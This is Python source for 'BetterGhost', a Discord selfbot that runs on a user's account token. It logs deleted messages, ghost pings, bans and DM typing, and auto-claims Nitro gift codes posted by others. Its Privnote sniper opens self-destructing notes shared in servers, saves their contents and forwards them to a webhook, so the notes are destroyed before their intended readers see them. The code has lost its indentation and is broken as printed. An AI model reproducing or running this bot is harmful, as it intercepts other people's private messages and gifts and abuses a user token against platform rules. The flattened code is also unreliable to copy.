# hideText = "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||"
if not __custommotd__:
motd = "Developed by Benny. Continued by ambient | Discontinued October 2021"
else:
motd = __custommotdtext__
@BetterGhost.event
async def on_connect():
if str(sounddevice.query_devices()) != "":
pygame.mixer.init()
width = os.get_terminal_size().columns
if is_windows():
os.system("cls")
os.system(f"title BetterGhost [{version}] [{BetterGhost.user}]")
if is_linux():
os.system("clear")
def constant_input2(bot):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(constant_input(bot))
loop.close()
threading.Thread(target=constant_input2, args=(BetterGhost,)).start()
if consoleMode.lower() == "new":
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rainbow":
print("")
print(fg.consoleColour + "")
print(fg.cRed + " ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print(fg.cOrange + "██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print(fg.cYellow + "██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print(fg.cGreen + "██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print(fg.cBlue + "╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(fg.cPurple + " ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new2":
print("")
print(fg.consoleColour + "")
print(" ______ __ __ ______ ______ ______ ".center(width))
print("/\ ___\ /\ \_\ \ /\ __ \ /\ ___\ /\__ _\ ".center(width))
print("\ \ \__ \ \ \ __ \ \ \ \/\ \ \ \___ \ \/_/\ \/ ".center(width))
print(" \ \_____\ \ \_\ \_\ \ \_____\ \/\_____\ \ \_\ ".center(width))
print(" \/_____/ \/_/\/_/ \/_____/ \/_____/ \/_/ ".center(width))
print(" ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new3":
print("")
print(fg.consoleColour + "")
print(" 88 ".center(width))
print(" 88 ,d ".center(width))
print(" 88 88 ".center(width))
print(" ,adPPYb,d8 88,dPPYba, ,adPPYba, ,adPPYba, MM88MMM ".center(width))
print('a8" `Y88 88P\' "8a a8" "8a I8[ "" 88 '.center(width))
print('8b 88 88 88 8b d8 `"Y8ba, 88 '.center(width))
print('"8a, ,d88 88 88 "8a, ,a8" aa ]8I 88, '.center(width))
print(' `"YbbdP"Y8 88 88 `"YbbdP"\' `"YbbdP"\' "Y888 '.center(width))
print(' aa, ,88 '.center(width))
print(' "Y8bbdP" '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "new4":
print("")
print(fg.consoleColour + "")
print(" ▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ".center(width))
print(" ███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ".center(width))
print(" ███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ".center(width))
print(" ▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ".center(width))
print('▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ███ ███ '.center(width))
print(' ███ ███ ███ ███ ███ ███ ▄█ ███ ███ '.center(width))
print(' ████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ '.center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "bear":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(fg.consoleColour + "")
print(" ▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄ ".center(os.get_terminal_size().columns))
print(" █▒▒░░░░░░░░░▒▒█ ".center(os.get_terminal_size().columns))
print(" █░░█░░░░░█░░█ ".center(os.get_terminal_size().columns))
print(" ▄▄ █░░░▀█▀░░░█ ▄▄ ".center(os.get_terminal_size().columns))
print(" █░░█ ▀▄░░░░░░░▄▀ █░░█ ".center(os.get_terminal_size().columns))
print("█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█".center(os.get_terminal_size().columns))
print("█░█▀▀░░█ █░░█▀█░░█▀░░▀█▀░█".center(os.get_terminal_size().columns))
print("█░█▄█░░█▀█░░█▄█░░▄█░░ █ ░█".center(os.get_terminal_size().columns))
print("█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█".center(os.get_terminal_size().columns))
print("")
print(fg.cWhite + f"{motd}".center(os.get_terminal_size().columns))
print(fg.consoleColour + '─'*os.get_terminal_size().columns)
print("")
elif consoleMode.lower() == "old":
print("")
print(fg.consoleColour + "")
print(" ▄████ ██░ ██ ▒█████ ██████ ▄▄▄█████▓".center(width))
print(" ██▒ ▀█▒▓██░ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒".center(width))
print("▒██░▄▄▄░▒██▀▀██░▒██░ ██▒░ ▓██▄ ▒ ▓██░ ▒░".center(width))
print("░▓█ ██▓░▓█ ░██ ▒██ ██░ ▒ ██▒░ ▓██▓ ░ ".center(width))
print("░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒ ▒██▒ ░ ".center(width))
print(" ░▒ ▒ ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░ ▒ ░░ ".center(width))
print(" ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ░▒ ░ ░ ░ ".center(width))
print("░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░ ░ ".center(width))
print(" ░ ░ ░ ░ ░ ░ ░ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
elif consoleMode not in consoleModes:
print("")
print(fg.consoleColour + "")
print(" ██████╗ ██╗ ██╗ ██████╗ ███████╗████████╗".center(width))
print("██╔════╝ ██║ ██║██╔═══██╗██╔════╝╚══██╔══╝".center(width))
print("██║ ███╗███████║██║ ██║███████╗ ██║ ".center(width))
print("██║ ██║██╔══██║██║ ██║╚════██║ ██║ ".center(width))
print("╚██████╔╝██║ ██║╚██████╔╝███████║ ██║ ".center(width))
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "react":
print("")
print(fg.consoleColour + "")
print("██████╗ ███████╗ █████╗ ██████╗████████╗".center(width))
print("██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝".center(width))
print("██████╔╝█████╗ ███████║██║ ██║ ".center(width))
print("██╔══██╗██╔══╝ ██╔══██║██║ ██║ ".center(width))
print("██║ ██║███████╗██║ ██║╚██████╗ ██║ ".center(width))
print("╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ".center(width))
print("")
print(fg.cWhite + f"{motd}".center(width))
print(fg.consoleColour + '─'*width)
print("")
if consoleMode.lower() == "rise":
print(fg.cBlue + "")
print("██████╗ ██╗███████╗███████╗ ███████╗███████╗██╗ ███████╗██████╗ ██████╗ ████████╗".center(width))
print("██╔══██╗██║██╔════╝██╔════╝ ██╔════╝██╔════╝██║ ██╔════╝██╔══██╗██╔═══██╗╚══██╔══╝".center(width))
print("██████╔╝██║███████╗█████╗ ███████╗█████╗ ██║ █████╗ ██████╔╝██║ ██║ ██║ ".center(width))
print("██╔══██╗██║╚════██║██╔══╝ ╚════██║██╔══╝ ██║ ██╔══╝ ██╔══██╗██║ ██║ ██║ ".center(width))
print("██║ ██║██║███████║███████╗ ███████║███████╗███████╗██║ ██████╔╝╚██████╔╝ ██║ ".center(width))
print("╚═╝ ╚═╝╚═╝╚══════╝╚══════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ".center(width))
print("╭─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╮")
print(fg.cGrey + f"Connected: {BetterGhost.user} | Prefix: {BetterGhost.command_prefix} | Servers: {len(BetterGhost.guilds)}".center(width))
print(fg.cBlue + "╰─━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━─╯")
print("")
print(fg.cBlue + '━'*width)
print("")
if consoleMode.lower() == "nighty":
if is_windows():
os.system("mode con: cols=90 lines=24")
print("")
print(f" {fg.cWhite}███{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}████████{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╗")
print(f" {fg.cWhite}████{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔════╝ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║╚══{fg.cWhite}██{fg.consoleColour}╔══╝╚{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}╔╝")
print(f" {fg.cWhite}██{fg.consoleColour}╔{fg.cWhite}██{fg.consoleColour}╗ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}███{fg.consoleColour}╗{fg.cWhite}███████{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}╔╝ ")
print(f" {fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██{fg.consoleColour}╗{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}╔══{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}██{fg.consoleColour}╔╝ ")
print(f" {fg.cWhite}██{fg.consoleColour}║ ╚{fg.cWhite}████{fg.consoleColour}║{fg.cWhite}██{fg.consoleColour}║╚{fg.cWhite}██████{fg.consoleColour}╔╝{fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ {fg.cWhite}██{fg.consoleColour}║ ")
print(fg.consoleColour + f" ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ")
print("")
print(f"{fg.cWhite}Status: {fg.cGreen}Connected")
print(f"{fg.cWhite}Account: {BetterGhost.user} [{len(BetterGhost.guilds)} servers] [{len(get_friends(__token__))} friends]")
print(f"{fg.cWhite}Prefix: {BetterGhost.command_prefix}")
print(fg.cWhite + '─'*os.get_terminal_size().columns)
# def getCurrentTime():
# return datetime.now().strftime("%H:%M")
# def print_important(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPurple}[Important] {fg.cGrey} | {message}")
# def print_info(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cYellow}[Information] {fg.cGrey} | {message}")
# def print_cmd(command):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.consoleColour}[Command] {fg.cGrey} | {BetterGhost.command_prefix}{command}")
# def print_sharecmd(author, command):
# print(f"{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
# def print_error(error):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cRed}[Error] {fg.cGrey} | {error}")
# def print_detect(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cPink}[Detect] {fg.cGrey} | {message}")
# def print_sniper(message):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {message}")
# def print_sniper_info(firstmessage, secondmessage):
# print(f"{fg.cGrey}{getCurrentTime()} | {fg.cOrange}[Sniper] {fg.cGrey} | {firstmessage} | {secondmessage}")
if "beta" in version.lower():
print_important("You're currently using a beta build of BetterGhost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
elif "dev" in version.lower():
print_important("You're currently using a developer build of BetterGhost.")
print_important("If you notice any bugs please report them to the developer.")
print(" ")
if not os.path.isfile('data/logins.txt'):
message = "1"
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
f = open('data/logins.txt', "w")
f.write(base64_message)
f.close()
else:
f = open('data/logins.txt', "r")
loginsdata = f.read()
base64_message = loginsdata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
logindata = int(message)+1
logindata_str = str(logindata)
logindata_bytes = logindata_str.encode('ascii')
base64_bytes = base64.b64encode(logindata_bytes)
base64_logindata = base64_bytes.decode('ascii')
f = open('data/logins.txt', "w")
f.write(f"{base64_logindata}")
f.close()
print_info(f"BetterGhost can now be used with {BetterGhost.command_prefix} prefix.")
send_notification("BetterGhost", "Successfully connected!", 10)
global __ghostloaded__
__ghostloaded__ = True
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/connected.mp3"))
pygame.mixer.music.play(1)
if json.load(open("richpresence.json"))["enabled"] == True:
def readyCallback(current_user):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been enabled.")
def disconnectedCallback(codeno, codemsg):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}Discord rich presence has been disabled.")
def errorCallback(errno, errmsg):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cBlue}[RPC] {fg.cWhite}An error happend.")
callbacks = {'ready': readyCallback,'disconnected': disconnectedCallback,'error': errorCallback}
discord_rpc.initialize(str(json.load(open("richpresence.json"))["client_id"]), callbacks=callbacks, log=False)
for i in range(10):
discord_rpc.update_presence(**{
'details': json.load(open("richpresence.json"))["details"].replace("{version}", version),
'state': json.load(open("richpresence.json"))["state"].replace("{version}", version),
'start_timestamp': time.time(),
'large_image_key': json.load(open("richpresence.json"))["large_image_key"],
'large_image_text': json.load(open("richpresence.json"))["large_image_text"],
'small_image_key': json.load(open("richpresence.json"))["small_image_key"],
'small_image_text': json.load(open("richpresence.json"))["small_image_text"]
})
discord_rpc.update_connection()
await asyncio.sleep(2)
discord_rpc.run_callbacks()
async def get_message(ctx, id):
channelMsgHistory = await ctx.channel.history(limit=999999999).flatten()
for message in channelMsgHistory:
if message.id == id:
msg = message
return msg
@BetterGhost.event
async def on_error(event):
logging.error(str(event))
@BetterGhost.event
async def on_command(ctx):
try:
await ctx.message.delete()
except:
pass
print_cmd(f"{ctx.command.name}")
@BetterGhost.event
async def on_command_error(ctx, error):
logging.error(str(error))
if isinstance(error, commands.CommandNotFound):
try:
await ctx.message.delete()
except:
pass
else:
print_error(f"{error}")
try:
await ctx.message.delete()
except:
pass
@BetterGhost.event
async def on_message_delete(message):
if __ghostloaded__:
if Config.getConfig()["detections"]["deletedmessages"]:
if message.guild.id not in __ignoredservers__["deletedmessages"]:
print_detect("Deleted Message")
print_sniper_info("Content", message.content)
print_sniper_info("Author", str(message.author))
try:
print_sniper_info("Channel", str(message.channel))
except:
pass
try:
print_sniper_info("Guild", str(message.guild.name))
except:
pass
if Config.getConfig()["detections"]["ghostping"]:
if BetterGhost.user.mentioned_in(message):
if message.guild.id not in __ignoredservers__["ghostpings"]:
print_detect("BetterGhost Ping")
print_sniper_info("Content", str(message.content))
print_sniper_info("Author", str(message.author))
try:
print_sniper_info("Channel", str(message.channel))
except:
pass
try:
print_sniper_info("Guild", str(message.guild.name))
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("BetterGhost Ping", f"You were ghost pinged in {message.guild} by {message.author}.", 10)
if __ghostpingwebhook__ != "":
webhook = DiscordWebhook(url=__ghostpingwebhook__)
embed = DiscordEmbed(title='BetterGhost Ping', color=__embedcolourraw__[1:], description=f"`{message.author}` ghost pinged you in `{message.channel}` (`{message.guild}`)")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
webhook.add_embed(embed)
response = webhook.execute()
@BetterGhost.event
async def on_member_ban(guild, user):
if __ghostloaded__:
if Config.getConfig()["detections"]["bans"]:
if guild.id not in __ignoredservers__["bans"]:
print_detect("Banned")
print_sniper_info("Member", f"{user}")
print_sniper_info("Member ID", f"{user.id}")
print_sniper_info("Guild", f"{guild.name}")
if str(BetterGhost.user) == str(user):
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ban Detect", f"You were banned in {guild.name}.", 10)
@BetterGhost.event
async def on_guild_remove(guild):
if __ghostloaded__:
if Config.getConfig()["detections"]["guildleave"]:
if guild.id not in __guildleaveignoredservers__:
print_detect("Guild Left")
print_sniper_info("Name", guild.name)
print_sniper_info("ID", guild.id)
print_sniper_info("Owner", guild.owner)
if __guildleavewebhook__ != "":
webhook = DiscordWebhook(url=__guildleavewebhook__)
embed = DiscordEmbed(title='Guild Leave Detection', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Name', value=str(guild.name), inline=False)
embed.add_embed_field(name='ID', value=str(guild.id), inline=False)
embed.add_embed_field(name='Owner', value=str(guild.owner), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@BetterGhost.event
async def on_webhooks_update(channel):
if __ghostloaded__:
if Config.getConfig()["detections"]["webhookmodification"]:
if channel.guild.id not in __ignoredservers__["webhookmodifications"]:
print_detect("Webhook Modification")
try:
print_sniper_info("Server", channel.guild.name)
except:
pass
try:
print_sniper_info("Channel", channel.name)
except:
pass
@BetterGhost.event
async def on_relationship_add(relationship):
if __ghostloaded__:
if Config.getConfig()["detections"]["friendsupdate"]:
if isinstance(relationship.type, discord.RelationshipType.incoming_request):
print_detect("Incoming Friend Request")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Incoming Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if isinstance(relationship.type, discord.RelationshipType.friend):
print_detect("New Friend")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Incoming Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@BetterGhost.event
async def on_relationship_remove(relationship):
if __ghostloaded__:
if Config.getConfig()["detections"]["friendsupdate"]:
if isinstance(relationship.type, discord.RelationshipType.outgoing_request):
print_detect("Outgoing Friend Request")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Outgoing Friend Request', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if isinstance(relationship.type, discord.RelationshipType.blocked):
print_detect("Blocked User")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Blocked User', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if isinstance(relationship.type, discord.RelationshipType.friend):
print_detect("Removed Friend")
print_sniper_info("User", relationship.user.name + "#" + relationship.user.discriminator)
print_sniper_info("ID", relationship.user.id)
if __friendsupdatewebhook__ != "":
webhook = DiscordWebhook(url=__friendsupdatewebhook__)
embed = DiscordEmbed(title='Removed Friend', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=relationship.user.name + "#" + relationship.user.discriminator, inline=False)
embed.add_embed_field(name='ID', value=str(relationship.user.id), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@BetterGhost.event
async def on_typing(channel, user, when):
if __ghostloaded__:
if isinstance(channel, discord.DMChannel):
if Config.getConfig()["detections"]["dmtyping"]:
print_detect(f"DM Typing")
print_sniper_info("User", user)
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("DM Typing", f"{user} is typing in their DMs.", 10)
if __dmtypingwebhook__ != "":
webhook = DiscordWebhook(url=__dmtypingwebhook__)
embed = DiscordEmbed(title='DM Typing', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='User', value=str(user), inline=False)
embed.add_embed_field(name='ID', value=str(user.id), inline=False)
embed.add_embed_field(name='When', value=str(when), inline=False)
webhook.add_embed(embed)
response = webhook.execute()
@BetterGhost.event
async def on_guild_channel_create(channel):
if __ghostloaded__:
if Config.getConfig()["snipers"]["tickets"]:
if "ticket" in channel.name:
if channel.guild.id not in __ignoredservers__["tickets"]:
if str(channel.type).lower() != "category":
request = requests.get(f"https://discord.com/api/channels/{channel.id}", headers={"Authorization": __token__, "User-Agent": get_random_user_agent()})
if request.status_code == 200:
print_sniper("Ticket")
try:
print_sniper_info("Server", channel.guild.name)
except:
pass
try:
print_sniper_info("Channel", channel.name)
except:
pass
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Ticket Sniper", f"{channel.name} was created in {channel.guild.name}.", 10)
if __ticketswebhook__ != "":
webhook = DiscordWebhook(url=__ticketswebhook__)
embed = DiscordEmbed(title='Ticket', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
try:
embed.add_embed_field(name='Server', value=str(channel.guild.name), inline=False)
except:
pass
try:
embed.add_embed_field(name='Channel', value=str(channel.name), inline=False)
except:
pass
webhook.add_embed(embed)
response = webhook.execute()
@BetterGhost.event
async def on_message(message):
if __ghostloaded__:
messageSendTime = datetime.now()
if message.author.id != BetterGhost.user.id:
if afkMode:
if isinstance(message.channel, discord.DMChannel):
await message.channel.send(CONFIG["afkmode"]["replymessage"])
if Config.getConfig()["snipers"]["nitro"]:
if "discord.gift/" in message.content:
if message.guild.id not in __ignoredservers__["nitro"]:
giftLink = ""
code = ""
for item in message.content.split(" "):
if "discord.gift/" in item:
giftLink = item
code = giftLink.replace("discord.gift/", "")
print_sniper("Nitro")
print_sniper_info("Link", giftLink)
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
nitroStatus = claim_nitro(code, __token__)
print_sniper_info("Status", nitroStatus)
print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
if __nitrowebhook__ != "":
webhook = DiscordWebhook(url=__nitrowebhook__)
embed = DiscordEmbed(title='Nitro Sniper', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
embed.add_embed_field(name='Gift Link', value=giftLink, inline=False)
embed.add_embed_field(name='Nitro Status', value=nitroStatus, inline=False)
embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if nitroStatus == "Valid Code":
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Nitro Sniper", "Sniped a nitro gift code!", 10)
if Config.getConfig()["snipers"]["privnote"]:
if "privnote.com/" in message.content:
if message.guild.id not in __ignoredservers__["privnote"]:
privnoteLink = ""
fid = datetime.now().strftime("%m_%d_%Y-%H_%M_%S")
for item in message.content.split(" "):
if "privnote.com/" in item:
privnoteLink = item
print_sniper("Privnote")
print_sniper_info("Link", privnoteLink)
print_sniper_info("Author", message.author)
try:
print_sniper_info("Server", message.guild.name)
except:
pass
try:
print_sniper_info("Channel", message.channel.name)
except:
pass
try:
content = read_privnote(privnoteLink)
file = open(f"privnote-saves/{fid}.txt", "w")
file.write(f"Privnote sent by {message.author} in #{message.channel.name}, {message.guild.name}.\nSniped at {fid}.\n \n{content}")
file.close()
print_sniper_info("Content", content)
if Config.getConfig()["sounds"]:
if str(sounddevice.query_devices()) != "":
pygame.mixer.music.load(resource_path("sounds/notification.mp3"))
pygame.mixer.music.play(1)
send_notification("Privnote Sniper", "Sniped a privnote note!", 10)
except:
print_sniper_info("Failed", "Note already been read.")
print_sniper_info("Snipe Speed", str((datetime.now()-messageSendTime).total_seconds()) + "s")
if __privnotewebhook__ != "":
webhook = DiscordWebhook(url=__privnotewebhook__)
embed = DiscordEmbed(title='Privnote Sniper', color=__embedcolourraw__[1:])
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_timestamp()
embed.add_embed_field(name='Author', value=str(message.author), inline=False)
embed.add_embed_field(name='Privnote Link', value=privnoteLink, inline=False)
try:
embed.add_embed_field(name='Content', value=content, inline=False)
except:
embed.add_embed_field(name='Failed', value="Note already been read.", inline=False)
embed.add_embed_field(name='Jump to message', value=f"[Click Here!]({message.jump_url})", inline=False)
webhook.add_embed(embed)
response = webhook.execute()
if Config.getConfig()["snipers"]["giveaway"]:
if message.embeds:
messageEmbed = discord.Embed.to_dict(message.embeds[0])
if int(message.author.id) in giveawayBots and message.author.bot:
isGiveaway = False
